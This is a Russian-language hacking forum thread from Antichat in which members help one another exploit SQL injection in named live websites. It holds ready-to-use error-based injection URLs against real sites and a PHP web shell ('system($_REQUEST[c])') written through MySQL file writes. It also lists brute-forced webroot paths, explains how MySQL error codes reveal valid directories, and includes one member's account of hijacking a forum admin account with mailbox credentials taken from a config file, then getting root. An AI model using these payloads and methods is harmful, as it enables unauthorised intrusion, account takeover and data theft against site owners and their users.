Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Aniweste, всё нормально.

    fro воспринимается как псевдоним для колонки, запрос корректен.
    В случае с from в запрос из-за фильтра поступает муть и вы видите ошибку.
     
  2. [dword]

    [dword] Elder - Старейшина

    Joined:
    11 Apr 2007
    Messages:
    109
    Likes Received:
    74
    Reputations:
    40
    Помогите разобраться, там Joomla.

    http://k apper-sng.ru/insiderskaya-informaciya?start=4
    пытаюсь раскрутить переменную start, но видимо мало еще понимаю механизм.
    при запросе start=-4
    пытаюсь подобрать столбцы, но не получается, не пропадает ошибка.
    при start=99999 выдаётся пустая страница, без содержания. Вроде и есть инъекция (на сколько моих знаний хватает), но не могу понять, как использовать.
    Покажите правильную дорогу пожалуйста. Благодарю заранее.
     
  3. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Здесь нечего крутить, к лимиту допускаются только целые числа, здесь в любом случае нет даже вариантов к раскрутке.
     
    1 person likes this.
  4. sav77

    sav77 Member

    Joined:
    20 Oct 2010
    Messages:
    55
    Likes Received:
    13
    Reputations:
    0
    Помогите, как начинаю раскручивать - перекидывает на localhost...
     
  5. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    А что вы там крутите то ? Тут так-же, как с предыдущим сайтом.
    Там есть более доступные варианты:
    Code:
    http://cyberfight.ru/site/polls/?topic_id=430&answer_id=(select max(0)from information_schema.schemata group by concat(0x427920496E6F6D7321,0x3b,user(),hex(rand(0))))
     
    1 person likes this.
  6. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Вопрос, наверное, тупой и т.д., но всё-таки:
    При выводе через SQL-injection данных из information_schema.schemata schema_name мы получим базы данных к которым имеет доступ данный пользователь? Или вообще ко всем базам данных?
    Соответственно, если ответом на мой вопрос является - ко всем базам данных, к которым имеет доступ пользователь, то у меня второй вопрос:
    Если среди этих баз есть mysql, то можно ли узнать file_priv через mysql.user (спрашиваю, т.к. в моём случае выбивает ошибку)? :) Т.е. через information_schema.schemata schema_name получили данные из base1, information_shema и mysql , но прочитать можем только первые 2. Вот :)
     
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Если в information_schema фигурирует mysql, но чтение с неё не производит - доступ к данной бд урезан для текущего пользователя, попросту говоря, запрещён.

    Соответственно, чтобы прочитать колонки с этой БД, тебе нужны права на выборку (селекцию). Если прав нет - чтение произвести ты не сможешь.
     
    _________________________
  8. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Aniweste, Все права можно посмотреть в information_schema.TABLE_PRIVILEGES, information_schema.COLUMN_PRIVILEGES, information_schema.SCHEMA_PRIVILEGES и information_schema.USER_PRIVILEGES.
     
  9. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    BigBear, XAMEHA - спасибо за ответы :)
     
    1 person likes this.
  10. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Ещё один вопрос.
    Сайт - site.com
    File_priv - Y
    Вывод /etc/passwd под пользователя user() web - /home/web
    Вывод /etc/httpd/conf/httpd.conf - DocumentRoot "/var/www/html"
    Проверка заливки <?php system($_REQUEST[c]); ?> в '/tmp/test.txt' и вывод через load_file('tmp/test.txt')- 1,2,3,4,5,6,7,8,9,10,12
    Пытался заливать в:
    Code:
    /home/www/data/www/1.txt
    /home/www/data/1.txt
    /home/www/data/www/site.com/1.txt
    /home/www/data/www/site/1.txt
    /home/www/1.txt
    /home/www/sites/site.com/htdocs/1.txt
    /home/www/sites/sitecom/htdocs/1.txt
    /home/www/sites/site/htdocs/1.txt
    /home/www/sites/site.com/httpdocs/1.txt
    /home/www/sites/sitecom/httpdocs/1.txt
    /home/www/sites/site/httpdocs/1.txt
    /home/www/sites/sitecom/httdocs/1.txt
    /home/www/site/site.com/htdocs/1.txt
    /home/www/site/sitecom/htdocs/1.txt
    /home/www/site/site/htdocs/1.txt
    /home/www/site/site.com/httpdocs/1.txt
    /home/www/site/sitecom/httpdocs/1.txt
    /home/www/site/site/httpdocs/1.txt
    /home/www/site/sitecom/httdocs/1.txt
    /home/web/data/www/1.txt/1.txt
    /home/web/data/1.txt
    /home/web/data/www/site.com/1.txt
    /home/web/data/www/site/1.txt
    /home/web/1.txt
    /home/web/sites/site.com/htdocs/1.txt
    /home/web/sites/sitecom/htdocs/1.txt
    /home/web/sites/site/htdocs/1.txt
    /home/web/sites/site.com/httpdocs/1.txt
    /home/web/sites/sitecom/httpdocs/1.txt
    /home/web/sites/site/httpdocs/1.txt
    /home/web/sites/sitecom/httdocs/1.txt
    /home/web/site/site.com/htdocs/1.txt
    /home/web/site/sitecom/htdocs/1.txt
    /home/web/site/site/htdocs/1.txt
    /home/web/site/site.com/httpdocs/1.txt
    /home/web/site/sitecom/httpdocs/1.txt
    /home/web/site/site/httpdocs/1.txt
    /home/web/site/sitecom/httdocs/1.txt
    /var/www/html/1.txt
    /var/www/web/1.txt
    /var/www/html/web/1.txt
    /var/www/html/site.com/1.txt
    /var/www/html/sitecom/1.txt
    /var/www/html/site/1.txt
    /var/www/html/web/site.com/1.txt
    /var/www/html/web/sitecom/1.txt
    /var/www/html/web/site/1.txt
    /var/www/web/data/www/site/1.txt
    /var/www/web/data/www/site.com/1.txt
    /var/www/web/data/www/sitecom/1.txt
    
    На результате это никак не сказалось. По сайту site.com/1.txt - 404 not found
    Пытался также перезаписать robots.txt - 404 not found
    И т.к. вывода с путём сайта я не нашёл ни так (при неверном запросе /var/wwwwwww/1.txt нету Errcode), не через google (искал вывод ошибки с этого сайта с раскрытием путей), а также пробовал через все вышеперечисленные варианты прочесть корневой robots.txt (через load_file), но как итог - нет результата. у меня 2 вопроса:

    1. Возможно ли, что запись в корень не возможна и соответственно невозможно чтение из корня или же я просто не попал на правильные пути?
    2. Второй вопрос вытекает из всего вышеперечисленного! Как ещё можно узнать полный путь до корня? :)

    P.s. вопрос с админкой отпадает - она переименована и её найти не смог. Как и директорию с phpmyadmin.
     
  11. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Просто интересно, нахрена, если

    Но ты обязательно продолжай и держи нас в курсе событий !! Есть ещё много интересных директорий !

    Ответы:
    1) Возможно. Правильный путь проверяется load_file любого существующего файла.
    2) Напоролся не на тот конфиг Apache, вариант - старый конфиг.
     
    _________________________
    #23291 BigBear, 4 Jun 2014
    Last edited: 4 Jun 2014
    1 person likes this.
  12. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Полный путь до корня можно узнать из конфига. Это не обязательно /etc/httpd/conf/httpd.conf. Этот конфиг как правило правят руками, на всяких шаредах разведен бардак в подключаемых конфигах. Аналогично, это зависит от демона. А также phpinfo и любой вывод ошибок. Скиньте вашу ссылочку в пм, поищем админку.
     
  13. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Я не дописал :mad: Тоже тестил:
    Code:
    /var/www/html/1.txt
    /var/www/html/site/1.txt
    /var/www/html/sitecom/1.txt
    /var/www/html/site.com/1.txt
    /var/www/html/web/site/1.txt
    /var/www/html/web/sitecom/1.txt
    /var/www/html/web/site.com/1.txt
    /var/www/html/web/1.txt
    
    И также пробовал подгружать существующий в корне robots :mad: Результат такой же. Странно, что сразу не дописал :(
    И нашёл php.ini в корне :(
     
    #23293 Aniweste, 4 Jun 2014
    Last edited: 4 Jun 2014
  14. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    а код ошибки при записи какой? мб путь нашол правильно а прав в папке нет
     
  15. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Один и тот же:
    PHP:
    ERROR 1 (HY000): Can't create/write to file '/root/a' (Errcode: 13)
    Чтобы узнать правильность пути, пишите в каталог. Когда он существует, выводится такая ошибка:
    PHP:
    ERROR 1086 (HY000): File '/root' already exists
    Этот метод сработает, если двигаться от корня к конечной директории.
     
  16. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    70
    Likes Received:
    12
    Reputations:
    1
    Как и просил BigBear, держу вас в курсе.
    Дело сдвинулось с мёртвой точки. Просматривал старые страницы сайта, какие они были 3 года назад и набрёл на форум. Его снесли, и перенесли в другую папку. Через час неудач - нашёл его по адресу site.com/forumdeleteadminforum :)))))))))
    Но и тут возникла неудача - на форуме учётки были привязаны к учёткам на сайте, но на сайте уже совсем всё по другому и 8 из 9 учёток не подошли, как и 9. Но из конфига самого сайта удалось достать доступ к почтовому ящику вида [email protected] на который 9-ый аккаунт смог заретривить пароль. После чего удалось зайти в админку phpbb. Всё удалось. Меня вроде бы ждал успех, но:
    http://s019.radikal.ru/i630/1406/a3/8f27972b561f.jpg
    .....
    Но потом я залился и получил рута через сплоит с рдота :rolleyes: .
    Знаю текст был лишним, но может кому-нибудь пригодится и он не забросит сайт :)
     
    1 person likes this.
  17. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    При инъекции в order by существуют ли способы раскрутки, помимо описанных здесь ?
     
  18. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    int, Вашим способом лучше перебирать биты (8 запросов на символ, 7-5 при оптимизации). Есть векторы, основаны на других методах, но пока без полноценного софта:

    https://rdot.org/forum/showthread.php?t=2865
     
    #23298 randman, 6 Jun 2014
    Last edited: 6 Jun 2014
  19. hakwar

    hakwar New Member

    Joined:
    25 Dec 2010
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Помогите раскрутить
    http://www.anabolic-pharma.com/?action=nws-show&id=1A
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    _ttp://www.anabolic-pharma.com/?action=nws-show&id=1+or+1=@@version

    читай мануал и крути:
    https://forum.antichat.ru/thread30501.html
     
    _________________________
Thread Status:
Not open for further replies.